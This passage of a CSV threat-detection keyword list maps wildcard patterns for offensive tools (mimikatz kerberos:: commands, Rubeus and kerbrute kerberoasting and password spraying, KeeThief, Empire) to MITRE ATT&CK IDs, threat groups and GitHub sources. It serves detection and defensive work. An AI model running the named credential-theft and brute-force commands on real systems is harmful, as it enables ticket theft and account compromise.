post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*KeeThief.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*KeeThiefSyscalls*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10",,"N/A",,, +"*keethief-syscalls*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*keodbianoliadkoelloecbhllnpiocoi*","greyware_tool_keyword","Hide My IP VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*kerberoast /*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*kerberoast /*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Kerberoast.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*kerberoast.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*Kerberoast.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*kerberoast_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerberoast_blind_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerberoast_john_results_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerberoastables.txt*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z" +"*kerberoasting*","offensive_tool_keyword","OSCP-Cheatsheets","kerberoasting keyword. attack that allows any domain user to request kerberos tickets from TGS that are encrypted with NTLM hash of the plaintext password of a domain user account that is used as a service account (i.e account used for running an IIS service) and crack them offline avoiding AD account lockouts.","T1558 - T1208 - T1003 - T1110","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting.md","1","1","N/A","N/A","1","81","33","2019-09-09T22:07:47Z","2019-09-12T22:07:31Z" +"*kerberoasting.boo*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*kerberos*.kirbi*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" +"*kerberos/decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*kerberos::ask*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::clist*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::golden*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::golden*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::hash*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::list*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. This function lists all Kerberos tickets in memory","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::ptc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::ptt *.kirbi*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*kerberos::ptt*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::ptt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::ptt*.kirbi*","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. we can impersonate the victim user towards any service in the domain.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*kerberos::purge*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::tgt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos_enumusers.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kerberos-ldap-password-hunter.sh*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kerberosv5.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kerbrute -*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute bruteuser *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*kerbrute passwordspray *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*kerbrute userenum *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*kerbrute userenum *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute*bruteforce*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute/cmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute/util*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute_*.exe*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerbrute_linux*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute_pass_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerbrute_user_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerbrute_userpass_wordlist_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerbrute_windows*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*KerbruteSession*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kernel_shellcode.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability 